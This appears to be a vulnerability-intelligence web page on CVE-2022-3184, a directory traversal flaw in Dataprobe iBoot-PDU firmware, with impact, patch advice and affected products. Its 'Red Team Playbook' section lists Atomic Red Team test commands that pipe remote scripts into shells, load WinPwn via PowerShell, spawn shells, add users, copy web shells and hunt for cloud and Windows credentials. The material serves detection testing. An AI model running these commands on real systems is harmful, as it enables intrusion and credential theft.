CVE-2022-3184
Overview
This vulnerability is a directory traversal flaw in the firmware of Dataprobe iBoot-PDU devices prior to version 1.42.06162022. It arises from improper validation of user-supplied input targeting an outdated PHP page within the device's web interface. The affected component is the legacy PHP endpoint embedded in the device firmware, which fails to restrict file path access, enabling unauthorized file write operations to the webroot directory.
Vulnerability Description
Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where the device’s existing firmware allows unauthenticated users to access an old PHP page vulnerable to directory traversal, which may allow a user to write a file to the webroot directory.
Impact
An unauthenticated attacker with network access can exploit this vulnerability to write arbitrary files to the device's webroot directory, enabling potential remote code execution or persistent compromise of the device. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), making it trivially exploitable in exposed environments. This can lead to unauthorized control over the device, disruption of power management operations, and lateral movement within industrial control or data center environments.
Solution
Dataprobe has released firmware version 1.42.06162022 to address this vulnerability. Users should upgrade all affected iBoot-PDU devices to this version or later. Detailed patch instructions and advisory information are available in the CISA ICS advisory ICSA-22-263-03 at https://www.cisa.gov/uscert/ics/advisories/icsa-22-263-03. No alternative mitigations or workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Dataprobe iBoot-PDU firmware versions prior to 1.42.06162022 is characterized by a directory traversal flaw that allows unauthenticated users to access sensitive files on the device. Specifically, the issue arises from an outdated PHP page that fails to properly validate user input, enabling attackers to manipulate file paths and potentially write files to the webroot directory. This lack of input validation creates a significant security gap, as it allows unauthorized users to exploit the device's functionality, leading to unauthorized access and potential compromise of the system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An attacker could initiate a request to the vulnerable PHP page, appending directory traversal sequences (e.g., "../") to the request. This would allow them to navigate the file system and target critical files within the webroot directory. In a practical scenario, an attacker could upload malicious scripts or files that could be executed by the web server, leading to further exploitation of the device or the broader network it is connected to. Additionally, the lack of authentication requirements means that any user with knowledge of the vulnerability can attempt to exploit it without needing valid credentials.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the affected devices for critical operations. The ability to write files to the webroot directory can lead to various malicious activities, including the installation of backdoors, data exfiltration, or even complete system compromise. For businesses, this translates to potential downtime, loss of sensitive data, and damage to reputation. Furthermore, the high CVSS score of 9.8 indicates that the vulnerability poses a critical risk, necessitating immediate attention and remediation efforts. Organizations that fail to address this vulnerability may find themselves exposed to legal liabilities, regulatory penalties, and financial losses stemming from breaches.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular vulnerability assessments and penetration testing should be conducted to identify and address security weaknesses in the firmware. Additionally, organizations should ensure that they are running the latest firmware version, as updates often include critical security patches that address known vulnerabilities. Implementing network segmentation can also help limit the exposure of vulnerable devices to untrusted networks, thereby reducing the attack surface. Furthermore, organizations should consider employing web application firewalls (WAF) to monitor and filter malicious traffic targeting the vulnerable PHP page.
In conclusion, the directory traversal vulnerability in the Dataprobe iBoot-PDU firmware represents a serious threat to the security of affected devices and the networks they operate within. The potential for unauthorized file access and manipulation underscores the need for robust security measures and proactive vulnerability management. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can take informed steps to safeguard their systems and mitigate the associated risks effectively.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-3184, with a recent emergence of new exploitation attempts targeting the vulnerable PHP page in Dataprobe iBoot-PDU firmware versions prior to 1.42.06162022. This uptick in telemetry indicates that threat actors are increasingly probing for and potentially leveraging this directory traversal vulnerability to write files to the webroot directory, which could facilitate persistent access or further compromise. Although no new exploit variants or proof-of-concept codes have been publicly identified, the sustained detection levels underscore a persistent interest from adversaries in exploiting this flaw. The EPSS score remains high, reflecting continued risk, and the stable trend suggests that exploitation attempts are maintaining momentum rather than diminishing. For defenders, this development signals an elevated threat environment where unpatched devices are at heightened risk of unauthorized manipulation. Consequently, the threat level associated with CVE-2022-3184 should be considered critically urgent, warranting ongoing vigilance and prioritization in vulnerability management programs.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dataprobe | Iboot-Pdu4-N20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu4-n20_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu4sa-N15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu4sa-n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu4a-N15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu4a-n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu4sa-N20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu4sa-n20_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu4a-N20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu4a-n20_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8sa-N15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8sa-n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8a-N15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8a-n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8sa-2n15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8sa-2n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8a-2n15 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8a-2n15_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8sa-N20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8sa-n20_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8a-N20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8a-n20_firmware:*:*:*:*:*:*:*:*
|
|
|
Dataprobe | Iboot-Pdu8a-2n20 Firmware | All |
cpe:2.3:o:dataprobe:iboot-pdu8a-2n20_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-3184 |
| cisa.gov |
GitHub CVE
|
https://www.cisa.gov/uscert/ics/advisories/icsa-22-263-03 |